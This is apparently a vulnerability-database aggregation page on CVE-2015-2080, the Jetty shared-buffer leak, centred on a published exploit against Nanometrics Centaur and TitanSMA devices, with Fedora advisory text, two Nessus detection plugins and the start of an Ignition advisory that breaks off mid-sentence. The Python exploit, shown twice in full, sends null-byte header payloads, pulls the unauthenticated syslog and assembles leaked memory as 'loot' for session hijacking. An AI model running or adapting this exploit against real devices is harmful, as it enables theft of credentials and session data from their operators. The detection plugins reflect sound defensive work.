Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak \n# Date: 2020-02-15 \n# Author: byteGoblin \n# Vendor: https://www.nanometrics.ca \n# Product: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# CVE: N/A \n# \n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit \n# \n# \n# Vendor: Nanometrics Inc. \n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma \n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder \n# \n# Affected versions: \n# Centaur <= 4.3.23 \n# TitanSMA <= 4.2.20 \n# \n# Summary: \n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists \n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities. \n# Its ease of use simplifies high performance geophysical sensing deplayments in both remote and \n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for \n# infrasound and similar geophysical sensor recording applications requiring sample rates up to \n# 5000 sps. \n# \n# Summary: \n# The TitanSMA is a strong motion accelerograph designed for high precision observational and \n# structural engineering applications, where scientists and engineers require exceptional dynamic \n# range over a wide frequency band. \n# \n# Description: \n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect \n# critical system logs such as 'syslog'. Additionally, the implemented Jetty version (9.4.z-SNAPSHOT) \n# suffers from a memory leak of shared buffers that was (supposedly) patched in Jetty version 9.2.9.v20150224. \n# As seen in the aforementioned products, the 'patched' version is still vulnerable to the buffer leakage. 
\n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP \n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system \n# logs. Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent \n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking \n# and authentication bypass scenarios. \n# \n# Tested on: \n# Jetty 9.4.z-SNAPSHOT \n# \n# Vulnerability discovered by: \n# byteGoblin @ zeroscience.mk \n# \n# \n# Advisory ID: ZSL-2020-5562 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n# \n# Related CVE: CVE-2015-2080 \n# Related CWE: CWE-532, CWE-538 \n# \n# 10.02.2020 \n# \n \n#!/usr/bin/env python3 \n \nimport requests \nimport re \nimport sys \n \nclass Goblin: \ndef __init__(self): \nself.host = None \nself.page = \"/zsl\" \nself.syslog = \"/logs/syslog\" \nself.buffer_pad = \"A\" * 70 \nself.buffer = None \nself.payload = \"\\xFF\" \nself.payloads_to_send = 70 # 70 seems to be a good number before we get weird results \nself.body = {} \nself.headers = None \nself.syslog_data = {} \nself.last_line = None \nself.before_last_line = True \n \ndef banner(self): \ngoblin = \"\"\" \nNN \nNkllON \n0;;::k000XN KxllokN \n0;,:,;;;;:ldK Kdccc::oK \nNx,';codddl:::dkdc:c:;lON \nklc:clloooooooc,.':lc;'lX \nx;:ooololccllc:,:ll:,:xX \nKd:cllc'..';:ccclc,.x _ . ___ _ . \nNOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \nNklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `. \n0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | | \n0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' 
`___,' /\\__ / / | \nNc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \nNl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed// \nXxclkXk;'::,,,''';:::;'''...'',:o0 \nKl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin \nO,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk \nKdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \nd;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. - nanometrics.ca \nOddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA \nd...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20 \n0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK \n0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A \n0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php \n:,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \nx:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product \nXx:,'':xk:..,''lK Y k;';;';xX \nXOkkko'.....'O d.';;,,:xN \n0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._ \nXOkkkkkON \n\"\"\" \nprint(goblin) \n \ndef generate_payload(self, amount_of_bytes): \nself.payload += \"\\x00\" * amount_of_bytes \nself.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload} \n \ndef read_syslog(self, initial=False): \n# Read syslog remotely and filter out 'HeapByteBuffer' messages. \n# 'initial' is used to make a 'snapshot' of the state before we send payloads... \n# That way we can filter on what we've just sent. \nprint(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog)) \nbuffer = \"\" \nr = requests.get(self.host + self.syslog) \nif r.status_code == 200: \nprint(\"[!] 
- We got syslog, it is: {} bytes\".format(len(r.content))) \nsplit = r.text.split(\"\\n\") \nfor line in split: \nif \"HeapByteBuffer\" in line: \nif initial: \nself.last_line = line \nelse: \nif line == self.last_line: \nself.before_last_line = False \nif not self.before_last_line: \nbuffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\") \ntry: \nleak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\") \nbuffer += leak \nexcept Exception as e: \nprint(e) \nif initial: \nreturn self.last_line \nself.buffer = buffer \nelse: # we can't access syslog? \nprint(\"[!!!] - Yoooo... we can't access syslog? Make sure you can access it, dawg...\") \nprint(\"[!!!] - The status code we got was: {}\".format(r.status_code)) \nexit(-1) \n \ndef show_output(self): \n# we need to translate '\\r\\n' into actual newlines \nif self.buffer is not None and self.buffer is not \"\": \nself.buffer = self.buffer.replace(\"\\\\n\", \"\\n\") \nself.buffer = self.buffer.replace(\"\\\\r\", \"\\r\") \nself.buffer = self.buffer.replace(\"%2f\", \"/\") \n \nprint(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer))) \nprint(\"=\" * 50) \nprint(\"[*] THIS IS THE LOOT\") \nprint(\"=\" * 50) \nfor num, x in enumerate(self.buffer.split(\"\\n\")): \nprint(\"{}.\\t| \\t{}\".format(num, x)) \n \ndef send_payload(self, amount): \nprint(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page)) \nif amount > self.payloads_to_send or amount < 0: \namount = self.payloads_to_send \nfor num, x in enumerate(range(0, amount)): \nif num % 10 == 0: \nprint(\"[!] - [{}/{}] payloads sent...\".format(num, amount)) \ntry: \nself.generate_payload(17) \nr = requests.post(self.host + self.page, data=self.body, headers=self.headers) \nexcept Exception as e: \nprint(e) \nprint(\"[!] 
- [{}/{}] payloads sent...\".format(amount, amount)) \n \ndef parse_sys_args(self): \nif len(sys.argv) >= 2: \nself.host = sys.argv[1] \nif not \"http\" in self.host: \nself.host = \"http://{}\".format(self.host) \nif len(sys.argv) == 3: \n# amount of packets to send \nself.payloads_to_send = sys.argv[2] \nelse: \nself.print_help() \n \ndef print_help(self): \nprint(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0])) \nprint(\"Example: centaur3.py 123.456.789.0:8080 200\") \nprint(\"\\tThis will send 200 payloads to the aforementioned host\") \nprint(\"\\tThe [port] and [amount of payloads] are optional\") \nexit(-1) \n \ndef main(self): \nself.parse_sys_args() \nself.banner() \nll = self.read_syslog(initial=True) \nself.send_payload(70) \nself.read_syslog() \nself.show_output() \n \nif __name__ == '__main__': \nGoblin().main() \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/156414/nanometricscentaur4323-leak.txt"}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2015-2080"], "description": " Jetty is a 100% Java HTTP Server and Servlet Container. This means that you do not need to configure and run a separate web server (like Apache) in order to use Java, servlets and JSPs to generate dynamic content. Jetty is a fully featured web server for static and dynamic content. Unlike separate server/container solutions, this means that your web server and web application run in the same process, without interconnection overheads and complications. Furthermore, as a pure java component, Jetty can be simply included in your application for demonstration, distribution or deployment. Jetty is available on all Java supported platforms. 
", "modified": "2015-03-13T17:28:20", "published": "2015-03-13T17:28:20", "id": "FEDORA:73DD962CD8C7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: jetty-9.2.9-1.fc22", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2021-01-12T10:13:28", "description": "Rebase to upstream version 9.2.9, resolves CVE-2015-2080 security\nvulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-03-17T00:00:00", "title": "Fedora 22 : jetty-9.2.9-1.fc22 (2015-2673)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2080"], "modified": "2015-03-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:jetty", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-2673.NASL", "href": "https://www.tenable.com/plugins/nessus/81841", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-2673.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81841);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-2080\");\n script_xref(name:\"FEDORA\", value:\"2015-2673\");\n\n script_name(english:\"Fedora 22 : jetty-9.2.9-1.fc22 (2015-2673)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Rebase to upstream version 
9.2.9, resolves CVE-2015-2080 security\nvulnerability.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1196254\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-March/151804.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44a1ecbc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected jetty package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jetty\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = 
eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"jetty-9.2.9-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jetty\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-01T03:19:13", "description": "The remote instance of Jetty is affected by a remote memory disclosure\nvulnerability in the HttpParser module due to incorrect handling of\nillegal characters in header values. When an illegal character is\nencountered in an HTTP request, Jetty writes a response in a shared\nbuffer that was used in a previous request. Jetty's response to the\nclient includes this shared buffer which contains potentially\nsensitive data from the previous request. An attacker, using specially\ncrafted requests containing variable length strings of illegal\ncharacters, can steal sensitive header data (e.g. cookies,\nauthentication tokens) or sensitive POST data (e.g. 
credentials).", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2015-02-27T00:00:00", "title": "Jetty HttpParser Error Remote Memory Disclosure", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2080"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mortbay:jetty"], "id": "JETTY_CVE-2015-2080.NASL", "href": "https://www.tenable.com/plugins/nessus/81576", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81576);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2015-2080\");\n script_bugtraq_id(72768);\n\n script_name(english:\"Jetty HttpParser Error Remote Memory Disclosure\");\n script_summary(english:\"Checks for a remote memory disclosure flaw.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by a remote memory disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote instance of Jetty is affected by a remote memory disclosure\nvulnerability in the HttpParser module due to incorrect handling of\nillegal characters in header values. When an illegal character is\nencountered in an HTTP request, Jetty writes a response in a shared\nbuffer that was used in a previous request. Jetty's response to the\nclient includes this shared buffer which contains potentially\nsensitive data from the previous request. An attacker, using specially\ncrafted requests containing variable length strings of illegal\ncharacters, can steal sensitive header data (e.g. cookies,\nauthentication tokens) or sensitive POST data (e.g. 
credentials).\");\n # https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8e07913\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.eclipse.org/bugs/show_bug.cgi?id=460642\");\n # https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f918c477\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Jetty 9.2.9.v20150224 or later. For Jetty 9.3.x, contact\nthe vendor for a solution.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-2080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mortbay:jetty\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default: 8080);\n\n# Unless we're paranoid, make sure the banner looks like Jetty.\nif (report_paranoia < 2)\n{\n banner = get_http_banner(port:port);\n if (isnull(banner) || \"Server: Jetty(\" >!< banner)\n audit(AUDIT_WRONG_WEB_SERVER, port, \"Jetty\");\n}\n\nresponse = http_send_recv3(\n method: \"GET\",\n item:\"/\",\n port:port,\n add_headers: make_array(\"Nessus-Header\", '\\x00')\n);\n\nif (isnull(response))\n audit(AUDIT_RESP_NOT, port, \"HTTP GET\");\n\nif (\"Illegal character 0x0 in state\" >!< response[0])\n audit(AUDIT_LISTEN_NOT_VULN, \"web server\", port);\n\nrequest = http_last_sent_request();\n\nrequest = str_replace(string:request, find:'\\x00', replace:\"\\x00\", count:1);\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n generic : TRUE,\n line_limit : 5,\n request : make_list(request),\n output : data_protection::sanitize_user_full_redaction(output:chomp(response[0]))\n);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:25", "description": "\nNanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak", "edition": 1, "published": "2020-02-19T00:00:00", "title": "Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2020-02-19T00:00:00", "id": "EXPLOITPACK:8381C100449907A0334DEEC7E23A5C2A", "href": "", "sourceData": "# Exploit Title: Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak\n# Date: 2020-02-15\n# Author: byteGoblin\n# Vendor: https://www.nanometrics.ca\n# Product: 
https://www.nanometrics.ca/products/accelerometers/titan-sma\n# Product: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder\n# CVE: N/A\n#\n# Nanometrics Centaur / TitanSMA Unauthenticated Remote Memory Leak Exploit\n#\n#\n# Vendor: Nanometrics Inc.\n# Product page: https://www.nanometrics.ca/products/accelerometers/titan-sma\n# Product page: https://www.nanometrics.ca/products/digitizers/centaur-digital-recorder\n#\n# Affected versions:\n# Centaur <= 4.3.23\n# TitanSMA <= 4.2.20\n#\n# Summary:\n# The Centaur Digital Recorder is a portable geophysical sensing acquisition system that consists\n# of a high-resolution 24-bit ADC, a precision GNSS-based clock, and removable storage capabilities.\n# Its ease of use simplifies high performance geophysical sensing deployments in both remote and\n# networked environments. Optimized for seismicity monitoring, the Centaur is also well-suited for\n# infrasound and similar geophysical sensor recording applications requiring sample rates up to\n# 5000 sps.\n#\n# Summary:\n# The TitanSMA is a strong motion accelerograph designed for high precision observational and\n# structural engineering applications, where scientists and engineers require exceptional dynamic\n# range over a wide frequency band.\n#\n# Description:\n# An information disclosure vulnerability exists when Centaur and TitanSMA fail to properly protect\n# critical system logs such as 'syslog', which are served without authentication (CWE-532, CWE-538).\n# Additionally, the bundled Jetty version (9.4.z-SNAPSHOT) still exposes shared request-buffer contents\n# when it rejects an HTTP header containing illegal characters - the same HttpParser 'Illegal character'\n# handling behind CVE-2015-2080 (fixed in Jetty 9.2.9.v20150224). Note that Jetty 9.4.x is outside the\n# version range covered by CVE-2015-2080, and that in these products the leaked bytes are read not from\n# the HTTP error response but from the logged diagnostic, which includes a detail dump of the shared\n# HeapByteBuffer (the '>>>' section this PoC extracts). The Jetty version alone therefore does not\n# determine exposure: the unauthenticated log endpoint must be access-controlled regardless.\n# Chaining these vulnerabilities allows an unauthenticated adversary to remotely send malicious HTTP\n# packets, and cause the shared buffer to 'bleed' contents of shared memory and store these in system\n# logs. 
Accessing these unprotected logfiles reveal parts of the leaked buffer (up to 17 bytes per sent\n# packet) which can be combined to leak sensitive data which can be used to perform session hijacking\n# and authentication bypass scenarios.\n#\n# Tested on:\n# Jetty 9.4.z-SNAPSHOT\n#\n# Vulnerability discovered by:\n# byteGoblin @ zeroscience.mk\n#\n#\n# Advisory ID: ZSL-2020-5562\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php\n#\n# Related CVE: CVE-2015-2080\n# Related CWE: CWE-532, CWE-538\n#\n# 10.02.2020\n#\n\n#!/usr/bin/env python3\n\nimport requests\nimport re\nimport sys\n\nclass Goblin:\n def __init__(self):\n self.host = None\n self.page = \"/zsl\"\n self.syslog = \"/logs/syslog\"\n self.buffer_pad = \"A\" * 70\n self.buffer = None\n self.payload = \"\\xFF\"\n self.payloads_to_send = 70 # 70 seems to be a good number before we get weird results\n self.body = {}\n self.headers = None\n self.syslog_data = {}\n self.last_line = None\n self.before_last_line = True\n\n def banner(self):\n goblin = \"\"\"\n NN \n NkllON \n 0;;::k000XN KxllokN \n 0;,:,;;;;:ldK Kdccc::oK \n Nx,';codddl:::dkdc:c:;lON \n klc:clloooooooc,.':lc;'lX \n x;:ooololccllc:,:ll:,:xX \n Kd:cllc'..';:ccclc,.x _ . ___ _ . \n NOoc::c:,'';:ccllc::''k \\ ___ , . _/_ ___ .' \\ __. \\ ___ | ` , __ \n Nklc:clccc;.;odoollc:',xN |/ \\ | ` | .' ` | .' \\ |/ \\ | | |' `.\n 0l:lollc:;:,.,ccllcc:;..cOKKX | ` | | | |----' | _ | | | ` | | | |\n 0c;lolc;'...',;;:::::;..:cc:,cK `___,' `---|. \\__/ `.___, `.___| `._.' `___,' /\\__ / / |\n Nc'clc;..,,,:::c:;;;,'..:oddoc;c0 \\___/ \n Nl';;,:,.;:,;:;;;,'.....cccc:;..x InTrOdUcEs: //Nano-Bleed//\n XxclkXk;'::,,,''';:::;'''...'',:o0 \n Kl,''',:cccccc:;..';;;:cc;;dX Discovered / Created by: byteGoblin\n O,.,;;,;:::::;;,,;::,.';:c';K contact: bytegoblin <at> zeroscience.mk\n Kdcccccdl'';;..'::;;,,,;:::;,'..;:.;K \n d;,;;'...',,,:,..,;,',,;;,,,'.cd,':.;K Vendor: Nanometrics Inc. 
- nanometrics.ca\n Oddl',,'',:cxX0:....'',,''..;dKKl,;,,xN Product: Centaur, TitanSMA\n d...'ckN Xkl:,',:clll:,..,cxd;,::,,xN Affected versions: <= 4.3.23, <= 4.3.20\n 0:',';k Xx:,''..,cccc::c:'.';:;..,;,lK\n 0:'clc':o;',;,,.';loddolc;'.,cc'.;olkN CVE: N/A\n 0:'cdxdc,..';..,lOo,:clc:'.,:ccc;.oN Advisory: ZSL-2020-5562 / zeroscience.mk/en/vulnerabilities/ZSL-2020-5562.php\n :,;okxdc,..,,..lK Xkol;:x0kl;;::;':0 \n x:,:odo:,'.',,.'xN 0lk Nk;';:;.cN Description: Unauthenticated Remote Memory Leak in Nanometrics Centaur product\n Xx:,'':xk:..,''lK Y k;';;';xX \n XOkkko'.....'O d.';;,,:xN\n 0dooooooxX x'.'''',oK _.o-'( Shout-out to the bois: LiquidWorm, 0nyxd, MemeQueen, Vaakos, Haunt3r )'-o._\n XOkkkkkON \n \"\"\"\n print(goblin)\n\n def generate_payload(self, amount_of_bytes):\n self.payload += \"\\x00\" * amount_of_bytes\n self.headers = {\"Cookie\": self.buffer_pad, \"Referer\": self.payload}\n\n def read_syslog(self, initial=False):\n # Read syslog remotely and filter out 'HeapByteBuffer' messages.\n # 'initial' is used to make a 'snapshot' of the state before we send payloads...\n # That way we can filter on what we've just sent.\n print(\"[!] - Grabbing syslog from: {}{}\".format(self.host, self.syslog))\n buffer = \"\"\n r = requests.get(self.host + self.syslog)\n if r.status_code == 200:\n print(\"[!] - We got syslog, it is: {} bytes\".format(len(r.content)))\n split = r.text.split(\"\\n\")\n for line in split:\n if \"HeapByteBuffer\" in line:\n if initial:\n self.last_line = line\n else:\n if line == self.last_line:\n self.before_last_line = False\n if not self.before_last_line:\n buffer_addr = re.search(\"\\@\\w+\", line).group(0).strip(\"@\")\n try:\n leak = re.search(\">>>.+(?=\\.\\.\\.)\", line).group(0).strip(\">>>\")\n buffer += leak\n except Exception as e:\n print(e)\n if initial:\n return self.last_line\n self.buffer = buffer\n else: # we can't access syslog?\n print(\"[!!!] - Yoooo... we can't access syslog? 
Make sure you can access it, dawg...\")\n print(\"[!!!] - The status code we got was: {}\".format(r.status_code))\n exit(-1)\n\n def show_output(self):\n # we need to translate '\\r\\n' into actual newlines\n if self.buffer is not None and self.buffer is not \"\":\n self.buffer = self.buffer.replace(\"\\\\n\", \"\\n\")\n self.buffer = self.buffer.replace(\"\\\\r\", \"\\r\")\n self.buffer = self.buffer.replace(\"%2f\", \"/\")\n\n print(\"[*] BUFFER LENGTH: {}\".format(len(self.buffer)))\n print(\"=\" * 50)\n print(\"[*] THIS IS THE LOOT\")\n print(\"=\" * 50)\n for num, x in enumerate(self.buffer.split(\"\\n\")):\n print(\"{}.\\t| \\t{}\".format(num, x))\n\n def send_payload(self, amount):\n print(\"[!] - Sending payloads to target: {}{}\".format(self.host, self.page))\n if amount > self.payloads_to_send or amount < 0:\n amount = self.payloads_to_send\n for num, x in enumerate(range(0, amount)):\n if num % 10 == 0:\n print(\"[!] - [{}/{}] payloads sent...\".format(num, amount))\n try:\n self.generate_payload(17)\n r = requests.post(self.host + self.page, data=self.body, headers=self.headers)\n except Exception as e:\n print(e)\n print(\"[!] 
- [{}/{}] payloads sent...\".format(amount, amount))\n\n def parse_sys_args(self):\n if len(sys.argv) >= 2:\n self.host = sys.argv[1]\n if not \"http\" in self.host:\n self.host = \"http://{}\".format(self.host)\n if len(sys.argv) == 3:\n # amount of packets to send\n self.payloads_to_send = sys.argv[2]\n else:\n self.print_help()\n\n def print_help(self):\n print(\"Usage: {} <ip_addr[:port]> [amount of payloads to send]\".format(sys.argv[0]))\n print(\"Example: centaur3.py 123.456.789.0:8080 200\")\n print(\"\\tThis will send 200 payloads to the aforementioned host\")\n print(\"\\tThe [port] and [amount of payloads] are optional\")\n exit(-1)\n\n def main(self):\n self.parse_sys_args()\n self.banner()\n ll = self.read_syslog(initial=True)\n self.send_payload(70)\n self.read_syslog()\n self.show_output()\n\nif __name__ == '__main__':\n Goblin().main()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:21", "description": "\nInductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers", "edition": 1, "published": "2016-02-17T00:00:00", "title": "Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-2080"], "modified": "2016-02-17T00:00:00", "id": "EXPLOITPACK:FFA957BFC443828CD6A7FF5B6E85B3EA", "href": "", "sourceData": "Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers\nVendor: Inductive Automation\nProduct web page: http://www.inductiveautomation.com\nAffected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)\nPlatform: Java\n\nSummary: Ignition is a powerful industrial application platform with\nfully integrated development tools for building SCADA, MES, and IIoT\nsolutions.\n\nDesc: Remote unauthenticated atackers are able to read arbitrary data\nfrom other HTTP sessions because Ignition uses a vulnerable Jetty server.\nWhen the Jetty web server receives a HTTP request, the below code is 
